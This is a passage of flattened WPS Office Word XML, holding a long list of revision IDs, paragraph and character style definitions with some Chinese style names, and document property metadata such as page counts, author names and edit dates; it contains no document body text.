    <w:rsid w:val="779C7935"/>
    <w:rsid w:val="77B384D9"/>
    <w:rsid w:val="77BEA595"/>
    <w:rsid w:val="77BFC626"/>
    <w:rsid w:val="77CF031A"/>
    <w:rsid w:val="77CF0EFC"/>
    <w:rsid w:val="77D3BDCE"/>
    <w:rsid w:val="77F63BD7"/>
    <w:rsid w:val="77FA4C65"/>
    <w:rsid w:val="77FBB923"/>
    <w:rsid w:val="77FFA892"/>
    <w:rsid w:val="77FFB23A"/>
    <w:rsid w:val="78BFD805"/>
    <w:rsid w:val="78EE9AD0"/>
    <w:rsid w:val="78FFF85F"/>
    <w:rsid w:val="795B6648"/>
    <w:rsid w:val="79F34434"/>
    <w:rsid w:val="7ACF4A8E"/>
    <w:rsid w:val="7ADDA33F"/>
    <w:rsid w:val="7AF33A54"/>
    <w:rsid w:val="7AFBCB41"/>
    <w:rsid w:val="7B6FE2C9"/>
    <w:rsid w:val="7B7D9FB0"/>
    <w:rsid w:val="7BB8FCCB"/>
    <w:rsid w:val="7BDBC74F"/>
    <w:rsid w:val="7BEB1730"/>
    <w:rsid w:val="7BF4D190"/>
    <w:rsid w:val="7BF7E0EE"/>
    <w:rsid w:val="7BFE4F53"/>
    <w:rsid w:val="7BFED472"/>
    <w:rsid w:val="7BFF05AE"/>
    <w:rsid w:val="7BFFC57E"/>
    <w:rsid w:val="7CEF46ED"/>
    <w:rsid w:val="7CFAD408"/>
    <w:rsid w:val="7D23E134"/>
    <w:rsid w:val="7D6E6D9E"/>
    <w:rsid w:val="7D6F6CC5"/>
    <w:rsid w:val="7D7C2C9F"/>
    <w:rsid w:val="7D7F3920"/>
    <w:rsid w:val="7D9D418A"/>
    <w:rsid w:val="7DBACE8D"/>
    <w:rsid w:val="7DBD6B88"/>
    <w:rsid w:val="7DD61FFB"/>
    <w:rsid w:val="7DE353C3"/>
    <w:rsid w:val="7DF7DBCB"/>
    <w:rsid w:val="7DF8497B"/>
    <w:rsid w:val="7DF9EE75"/>
    <w:rsid w:val="7DFB1330"/>
    <w:rsid w:val="7DFF85BB"/>
    <w:rsid w:val="7DFFB89C"/>
    <w:rsid w:val="7DFFBDB8"/>
    <w:rsid w:val="7E57F60E"/>
    <w:rsid w:val="7E77DB62"/>
    <w:rsid w:val="7ECFCE53"/>
    <w:rsid w:val="7ED7AC3D"/>
    <w:rsid w:val="7EE57F45"/>
    <w:rsid w:val="7EEED829"/>
    <w:rsid w:val="7EFBC33C"/>
    <w:rsid w:val="7EFC7F31"/>
    <w:rsid w:val="7EFF16F5"/>
    <w:rsid w:val="7EFF6E5C"/>
    <w:rsid w:val="7EFF6FE7"/>
    <w:rsid w:val="7EFFA845"/>
    <w:rsid w:val="7F172E1A"/>
    <w:rsid w:val="7F3542AB"/>
    <w:rsid w:val="7F3C446B"/>
    <w:rsid w:val="7F3E4623"/>
    <w:rsid w:val="7F3EC381"/>
    <w:rsid w:val="7F3F26EA"/>
    <w:rsid w:val="7F3F7926"/>
    <w:rsid w:val="7F3FCA01"/>
    <w:rsid w:val="7F5A1BDF"/>
    <w:rsid w:val="7F677234"/>
    <w:rsid w:val="7F6BCA5F"/>
    <w:rsid w:val="7F6F8457"/>
    <w:rsid w:val="7F765AE4"/>
    <w:rsid w:val="7F77872D"/>
    <w:rsid w:val="7F7CAF21"/>
    <w:rsid w:val="7F7F6C3B"/>
    <w:rsid w:val="7F8650B0"/>
    <w:rsid w:val="7F8E858E"/>
    <w:rsid w:val="7F97371C"/>
    <w:rsid w:val="7F9B13A2"/>
    <w:rsid w:val="7F9F4020"/>
    <w:rsid w:val="7F9F8718"/>
    <w:rsid w:val="7FAD6FFC"/>
    <w:rsid w:val="7FAE8A27"/>
    <w:rsid w:val="7FAF2F6D"/>
    <w:rsid w:val="7FB7EE52"/>
    <w:rsid w:val="7FBA6261"/>
    <w:rsid w:val="7FBDD05E"/>
    <w:rsid w:val="7FBF06C5"/>
    <w:rsid w:val="7FCD165A"/>
    <w:rsid w:val="7FD389B8"/>
    <w:rsid w:val="7FDB1060"/>
    <w:rsid w:val="7FDB1380"/>
    <w:rsid w:val="7FDC33A5"/>
    <w:rsid w:val="7FDE1B24"/>
    <w:rsid w:val="7FDE9BB5"/>
    <w:rsid w:val="7FDF3C54"/>
    <w:rsid w:val="7FDF7395"/>
    <w:rsid w:val="7FDFF540"/>
    <w:rsid w:val="7FE753B8"/>
    <w:rsid w:val="7FE91718"/>
    <w:rsid w:val="7FED4FEE"/>
    <w:rsid w:val="7FEF9068"/>
    <w:rsid w:val="7FF9C5CF"/>
    <w:rsid w:val="7FFB676B"/>
    <w:rsid w:val="7FFBDE8F"/>
    <w:rsid w:val="7FFE783C"/>
    <w:rsid w:val="7FFF1662"/>
    <w:rsid w:val="7FFF5A51"/>
    <w:rsid w:val="7FFFAB55"/>
    <w:rsid w:val="7FFFBDED"/>
    <w:rsid w:val="7FFFD120"/>
    <w:rsid w:val="7FFFDE93"/>
    <w:rsid w:val="7FFFE4B4"/>
    <w:rsid w:val="7FFFE4E2"/>
    <w:rsid w:val="7FFFE6F2"/>
    <w:rsid w:val="81CBB427"/>
    <w:rsid w:val="846F1683"/>
    <w:rsid w:val="87DFF041"/>
    <w:rsid w:val="957F7D59"/>
    <w:rsid w:val="96FF2011"/>
    <w:rsid w:val="9A7C2397"/>
    <w:rsid w:val="9B3107CA"/>
    <w:rsid w:val="9DFBC3CF"/>
    <w:rsid w:val="9DFED287"/>
    <w:rsid w:val="9ED67606"/>
    <w:rsid w:val="9EEA14FB"/>
    <w:rsid w:val="9EF78E25"/>
    <w:rsid w:val="9F8BD2A2"/>
    <w:rsid w:val="9FDD3EC0"/>
    <w:rsid w:val="9FF0C690"/>
    <w:rsid w:val="9FFBD4BA"/>
    <w:rsid w:val="9FFBEBFD"/>
    <w:rsid w:val="9FFFDFDE"/>
    <w:rsid w:val="A3C04C80"/>
    <w:rsid w:val="A57E6A90"/>
    <w:rsid w:val="A77BCFD6"/>
    <w:rsid w:val="A7869347"/>
    <w:rsid w:val="ABFBA9C1"/>
    <w:rsid w:val="ABFF5745"/>
    <w:rsid w:val="AD172FA6"/>
    <w:rsid w:val="AD7DFC40"/>
    <w:rsid w:val="ADDA6337"/>
    <w:rsid w:val="ADEDC87C"/>
    <w:rsid w:val="ADF667DE"/>
    <w:rsid w:val="AEAF1785"/>
    <w:rsid w:val="AEBD79EF"/>
    <w:rsid w:val="AEFFF339"/>
    <w:rsid w:val="AF6F37DE"/>
    <w:rsid w:val="AF7F2772"/>
    <w:rsid w:val="AFBAB81A"/>
    <w:rsid w:val="AFBF9D2B"/>
    <w:rsid w:val="AFCFB047"/>
    <w:rsid w:val="B2DFFFB4"/>
    <w:rsid w:val="B37FE4A1"/>
    <w:rsid w:val="B55745BE"/>
    <w:rsid w:val="B5BFA0B2"/>
    <w:rsid w:val="B5DF71BD"/>
    <w:rsid w:val="B6FBB5E7"/>
    <w:rsid w:val="B7D75EBB"/>
    <w:rsid w:val="B7DD0CE3"/>
    <w:rsid w:val="B7DDC023"/>
    <w:rsid w:val="B7DDF4FA"/>
    <w:rsid w:val="B7FD72BB"/>
    <w:rsid w:val="B8FDCA87"/>
    <w:rsid w:val="BB6BFD26"/>
    <w:rsid w:val="BB7E0BB4"/>
    <w:rsid w:val="BBBE4DCD"/>
    <w:rsid w:val="BBDFCCA7"/>
    <w:rsid w:val="BCDF0A25"/>
    <w:rsid w:val="BD5B020F"/>
    <w:rsid w:val="BD7DECAA"/>
    <w:rsid w:val="BDBA97B9"/>
    <w:rsid w:val="BDDD9FFD"/>
    <w:rsid w:val="BDF7DA2B"/>
    <w:rsid w:val="BDFD0A85"/>
    <w:rsid w:val="BDFD0E4A"/>
    <w:rsid w:val="BE3FDA1D"/>
    <w:rsid w:val="BEEB06B1"/>
    <w:rsid w:val="BEFB255C"/>
    <w:rsid w:val="BEFB390A"/>
    <w:rsid w:val="BEFF0352"/>
    <w:rsid w:val="BF7671F4"/>
    <w:rsid w:val="BFB75BB6"/>
    <w:rsid w:val="BFBB93A3"/>
    <w:rsid w:val="BFCD13CF"/>
    <w:rsid w:val="BFDE82CC"/>
    <w:rsid w:val="BFED31BB"/>
    <w:rsid w:val="BFF39B73"/>
    <w:rsid w:val="BFFD416E"/>
    <w:rsid w:val="BFFDE8CA"/>
    <w:rsid w:val="BFFF7B2D"/>
    <w:rsid w:val="C6FE9F5C"/>
    <w:rsid w:val="C7CBC9DA"/>
    <w:rsid w:val="CB1F0D84"/>
    <w:rsid w:val="CBFD67EF"/>
    <w:rsid w:val="CBFF3238"/>
    <w:rsid w:val="CCCD2939"/>
    <w:rsid w:val="CCED015C"/>
    <w:rsid w:val="CDBF6970"/>
    <w:rsid w:val="CDEBA72F"/>
    <w:rsid w:val="CDED08DC"/>
    <w:rsid w:val="CDFD9AFC"/>
    <w:rsid w:val="CE5A1387"/>
    <w:rsid w:val="CFB52691"/>
    <w:rsid w:val="CFB78C2F"/>
    <w:rsid w:val="D4753796"/>
    <w:rsid w:val="D54F98EA"/>
    <w:rsid w:val="D57A3ED1"/>
    <w:rsid w:val="D5E172B2"/>
    <w:rsid w:val="D63EDD30"/>
    <w:rsid w:val="D76329E0"/>
    <w:rsid w:val="D776FFB3"/>
    <w:rsid w:val="D77D069A"/>
    <w:rsid w:val="D7AB534D"/>
    <w:rsid w:val="D7F7D21A"/>
    <w:rsid w:val="D7F7D32C"/>
    <w:rsid w:val="D7FDB5D0"/>
    <w:rsid w:val="D7FEBBEA"/>
    <w:rsid w:val="D7FF2025"/>
    <w:rsid w:val="D883DC0C"/>
    <w:rsid w:val="D9F18C11"/>
    <w:rsid w:val="D9FF774B"/>
    <w:rsid w:val="DA33D1EF"/>
    <w:rsid w:val="DBB6697C"/>
    <w:rsid w:val="DBFF2F14"/>
    <w:rsid w:val="DC76DF32"/>
    <w:rsid w:val="DCBFC7BA"/>
    <w:rsid w:val="DCDF3EFB"/>
    <w:rsid w:val="DCEF4C10"/>
    <w:rsid w:val="DCEF5DF6"/>
    <w:rsid w:val="DDBFABFB"/>
    <w:rsid w:val="DDCF4774"/>
    <w:rsid w:val="DDCF6E01"/>
    <w:rsid w:val="DDF443BE"/>
    <w:rsid w:val="DDFED5F8"/>
    <w:rsid w:val="DE5FC368"/>
    <w:rsid w:val="DE7BF1FB"/>
    <w:rsid w:val="DEBDBE03"/>
    <w:rsid w:val="DEC7E205"/>
    <w:rsid w:val="DEFD03D7"/>
    <w:rsid w:val="DF077956"/>
    <w:rsid w:val="DF147B62"/>
    <w:rsid w:val="DF3F2A89"/>
    <w:rsid w:val="DF4AFAA1"/>
    <w:rsid w:val="DF5F1B85"/>
    <w:rsid w:val="DF7D4500"/>
    <w:rsid w:val="DF7DB782"/>
    <w:rsid w:val="DF872D24"/>
    <w:rsid w:val="DFD69D77"/>
    <w:rsid w:val="DFE5DFB7"/>
    <w:rsid w:val="DFE7C451"/>
    <w:rsid w:val="DFEF740E"/>
    <w:rsid w:val="DFF7F380"/>
    <w:rsid w:val="DFFB5197"/>
    <w:rsid w:val="DFFB5C15"/>
    <w:rsid w:val="DFFE63C6"/>
    <w:rsid w:val="DFFF8E47"/>
    <w:rsid w:val="DFFFD6B4"/>
    <w:rsid w:val="E157DADB"/>
    <w:rsid w:val="E3F76A72"/>
    <w:rsid w:val="E5BF06CF"/>
    <w:rsid w:val="E5DF3745"/>
    <w:rsid w:val="E61E23B6"/>
    <w:rsid w:val="E63522BE"/>
    <w:rsid w:val="E699CF34"/>
    <w:rsid w:val="E6FFAE1E"/>
    <w:rsid w:val="E71FC282"/>
    <w:rsid w:val="E75DA501"/>
    <w:rsid w:val="E7DB2E44"/>
    <w:rsid w:val="E7F7C377"/>
    <w:rsid w:val="E7FBB344"/>
    <w:rsid w:val="E8FFECC4"/>
    <w:rsid w:val="E96CEE50"/>
    <w:rsid w:val="EBA99733"/>
    <w:rsid w:val="EBB75774"/>
    <w:rsid w:val="EBF921D9"/>
    <w:rsid w:val="ECF99DB9"/>
    <w:rsid w:val="ECFB2DF7"/>
    <w:rsid w:val="ED3F9531"/>
    <w:rsid w:val="ED6EABAB"/>
    <w:rsid w:val="EEDFE9A9"/>
    <w:rsid w:val="EEE36FF2"/>
    <w:rsid w:val="EEEFD18E"/>
    <w:rsid w:val="EEFC92E4"/>
    <w:rsid w:val="EEFEC766"/>
    <w:rsid w:val="EEFFCA86"/>
    <w:rsid w:val="EF3C0C14"/>
    <w:rsid w:val="EF5293A0"/>
    <w:rsid w:val="EF580D30"/>
    <w:rsid w:val="EF5DF1F4"/>
    <w:rsid w:val="EF6EF3EE"/>
    <w:rsid w:val="EF6F25A2"/>
    <w:rsid w:val="EF75215B"/>
    <w:rsid w:val="EF9F926B"/>
    <w:rsid w:val="EFBD59FE"/>
    <w:rsid w:val="EFBE91D8"/>
    <w:rsid w:val="EFE38DEC"/>
    <w:rsid w:val="EFE70B32"/>
    <w:rsid w:val="EFE8F71C"/>
    <w:rsid w:val="EFED7A04"/>
    <w:rsid w:val="EFFDEFF5"/>
    <w:rsid w:val="EFFEE546"/>
    <w:rsid w:val="EFFFAC26"/>
    <w:rsid w:val="EFFFB536"/>
    <w:rsid w:val="EFFFFEA6"/>
    <w:rsid w:val="F25F4DDC"/>
    <w:rsid w:val="F2E0EA0B"/>
    <w:rsid w:val="F2F70DE4"/>
    <w:rsid w:val="F31F3DA9"/>
    <w:rsid w:val="F33D5674"/>
    <w:rsid w:val="F3535D09"/>
    <w:rsid w:val="F389C143"/>
    <w:rsid w:val="F3D5BB10"/>
    <w:rsid w:val="F3EF913B"/>
    <w:rsid w:val="F3FAD14C"/>
    <w:rsid w:val="F3FFEE0B"/>
    <w:rsid w:val="F4E94542"/>
    <w:rsid w:val="F4F7B8CC"/>
    <w:rsid w:val="F4FF439D"/>
    <w:rsid w:val="F52D072A"/>
    <w:rsid w:val="F5E2958A"/>
    <w:rsid w:val="F5F7D8E4"/>
    <w:rsid w:val="F5FC270B"/>
    <w:rsid w:val="F6778FD7"/>
    <w:rsid w:val="F6DB32D2"/>
    <w:rsid w:val="F6EF1503"/>
    <w:rsid w:val="F6FD3B1D"/>
    <w:rsid w:val="F6FF6833"/>
    <w:rsid w:val="F76EAB38"/>
    <w:rsid w:val="F77E7688"/>
    <w:rsid w:val="F77F1932"/>
    <w:rsid w:val="F77F6617"/>
    <w:rsid w:val="F77FA2C3"/>
    <w:rsid w:val="F7CF49EE"/>
    <w:rsid w:val="F7CF6802"/>
    <w:rsid w:val="F7DE219C"/>
    <w:rsid w:val="F7FB3E48"/>
    <w:rsid w:val="F7FD20B5"/>
    <w:rsid w:val="F7FF32DA"/>
    <w:rsid w:val="F8BE79CD"/>
    <w:rsid w:val="F8FFF3BA"/>
    <w:rsid w:val="F9756C75"/>
    <w:rsid w:val="F9BE1451"/>
    <w:rsid w:val="F9EF5D41"/>
    <w:rsid w:val="F9F5BC0A"/>
    <w:rsid w:val="F9FD55D5"/>
    <w:rsid w:val="FA9B6E87"/>
    <w:rsid w:val="FABCDB1C"/>
    <w:rsid w:val="FAC51FFC"/>
    <w:rsid w:val="FADF9F36"/>
    <w:rsid w:val="FAE3EC28"/>
    <w:rsid w:val="FAF7A499"/>
    <w:rsid w:val="FB6E80E5"/>
    <w:rsid w:val="FB76F33C"/>
    <w:rsid w:val="FB9482F6"/>
    <w:rsid w:val="FBAF17C1"/>
    <w:rsid w:val="FBBF0609"/>
    <w:rsid w:val="FBBF4BF5"/>
    <w:rsid w:val="FBBF7ECE"/>
    <w:rsid w:val="FBBFDFD8"/>
    <w:rsid w:val="FBD6D535"/>
    <w:rsid w:val="FBD72168"/>
    <w:rsid w:val="FBEF8DA5"/>
    <w:rsid w:val="FBF7E4F5"/>
    <w:rsid w:val="FBF7ED00"/>
    <w:rsid w:val="FBFB1205"/>
    <w:rsid w:val="FBFC0F79"/>
    <w:rsid w:val="FBFE0194"/>
    <w:rsid w:val="FBFE6ECC"/>
    <w:rsid w:val="FBFE8662"/>
    <w:rsid w:val="FC7B754D"/>
    <w:rsid w:val="FCAB3E1A"/>
    <w:rsid w:val="FCAD6B4B"/>
    <w:rsid w:val="FCCEFDE0"/>
    <w:rsid w:val="FCDF8E51"/>
    <w:rsid w:val="FCF79F25"/>
    <w:rsid w:val="FD5FFBBA"/>
    <w:rsid w:val="FD7A7040"/>
    <w:rsid w:val="FD9708D1"/>
    <w:rsid w:val="FD9A1225"/>
    <w:rsid w:val="FDBEE0CF"/>
    <w:rsid w:val="FDBFFCB5"/>
    <w:rsid w:val="FDDEF67C"/>
    <w:rsid w:val="FDE73192"/>
    <w:rsid w:val="FDF89FB8"/>
    <w:rsid w:val="FDFBC46A"/>
    <w:rsid w:val="FDFF4FE5"/>
    <w:rsid w:val="FDFF9117"/>
    <w:rsid w:val="FE2BFA41"/>
    <w:rsid w:val="FE52BF97"/>
    <w:rsid w:val="FE6D4978"/>
    <w:rsid w:val="FE7F129A"/>
    <w:rsid w:val="FE877531"/>
    <w:rsid w:val="FE9635FA"/>
    <w:rsid w:val="FE9B861C"/>
    <w:rsid w:val="FEB5849F"/>
    <w:rsid w:val="FEB7977F"/>
    <w:rsid w:val="FEBE0A54"/>
    <w:rsid w:val="FEBF7DD0"/>
    <w:rsid w:val="FEC77AEC"/>
    <w:rsid w:val="FECB5BE7"/>
    <w:rsid w:val="FECB79C8"/>
    <w:rsid w:val="FEDE424B"/>
    <w:rsid w:val="FEEB075A"/>
    <w:rsid w:val="FEEF35DB"/>
    <w:rsid w:val="FEF773D2"/>
    <w:rsid w:val="FEF7F237"/>
    <w:rsid w:val="FEFCBB69"/>
    <w:rsid w:val="FEFDF23F"/>
    <w:rsid w:val="FF2F558D"/>
    <w:rsid w:val="FF3DCDF0"/>
    <w:rsid w:val="FF4D1F3A"/>
    <w:rsid w:val="FF573CB5"/>
    <w:rsid w:val="FF5B45B0"/>
    <w:rsid w:val="FF6DC8C5"/>
    <w:rsid w:val="FF77F0A9"/>
    <w:rsid w:val="FF7F5ED6"/>
    <w:rsid w:val="FF9DF199"/>
    <w:rsid w:val="FF9E460B"/>
    <w:rsid w:val="FF9FAB28"/>
    <w:rsid w:val="FF9FEFB2"/>
    <w:rsid w:val="FFA7A5B6"/>
    <w:rsid w:val="FFB700DA"/>
    <w:rsid w:val="FFBD324E"/>
    <w:rsid w:val="FFD63C4A"/>
    <w:rsid w:val="FFD9A643"/>
    <w:rsid w:val="FFDC43B0"/>
    <w:rsid w:val="FFDD50E2"/>
    <w:rsid w:val="FFDEE155"/>
    <w:rsid w:val="FFDF38F4"/>
    <w:rsid w:val="FFEB818D"/>
    <w:rsid w:val="FFEDF701"/>
    <w:rsid w:val="FFF25B55"/>
    <w:rsid w:val="FFF5864A"/>
    <w:rsid w:val="FFF60346"/>
    <w:rsid w:val="FFF74F63"/>
    <w:rsid w:val="FFF78F5E"/>
    <w:rsid w:val="FFF7ADEB"/>
    <w:rsid w:val="FFF82C92"/>
    <w:rsid w:val="FFFB44AB"/>
    <w:rsid w:val="FFFB8C90"/>
    <w:rsid w:val="FFFD89AE"/>
    <w:rsid w:val="FFFD9061"/>
    <w:rsid w:val="FFFF033D"/>
    <w:rsid w:val="FFFF0679"/>
    <w:rsid w:val="FFFF23C2"/>
    <w:rsid w:val="FFFF290B"/>
    <w:rsid w:val="FFFF3803"/>
    <w:rsid w:val="FFFFBB44"/>
    <w:rsid w:val="FFFFCAAF"/>
    <w:rsid w:val="FFFFDB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20"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="357"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5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6">
    <w:name w:val="Date"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="100" w:leftChars="2500"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="1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  <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="22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page number"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="页眉 Char"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="正文文本 Char"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="课程实践"/>
    <w:basedOn w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="630"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="副标题 Char"/>
    <w:link w:val="10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3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4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22</Pages>
  <Words>465</Words>
  <Characters>764</Characters>
  <Lines>44</Lines>
  <Paragraphs>58</Paragraphs>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1171</CharactersWithSpaces>
  <Application>WPS Office_12.8.2.18605_F1E327BC-269C-435d-A152-05C5408002CA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2021-06-06T22:36:00Z</dcterms:created>
  <dc:creator>zhengzhangxiao</dc:creator>
  <cp:lastModifiedBy>xiaoke</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T15:17:51Z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2052-12.8.2.18605</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>A42B2D5041B1857428C6776610B0710C_43</vt:lpwstr>
  </property>
</Properties>
</file>